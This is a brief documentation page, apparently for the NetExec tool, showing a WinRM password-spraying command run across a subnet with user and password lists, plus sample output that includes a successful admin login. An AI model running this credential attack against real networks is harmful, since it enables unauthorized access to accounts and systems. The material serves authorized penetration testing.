Password Spraying
Password spraying (without bruteforce)
nxc winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Expected Results:
WINRM 192.168.255.131 5985 ROGER [*] http://192.168.255.131:5985/wsman
WINRM 192.168.255.131 5985 ROGER [-] GOLD\test1:pass1 "Failed to authenticate the user test1 with ntlm"
WINRM 192.168.255.131 5985 ROGER [+] GOLD\bonclay:Password@123 (Pwn3d!)
Last updated
Was this helpful?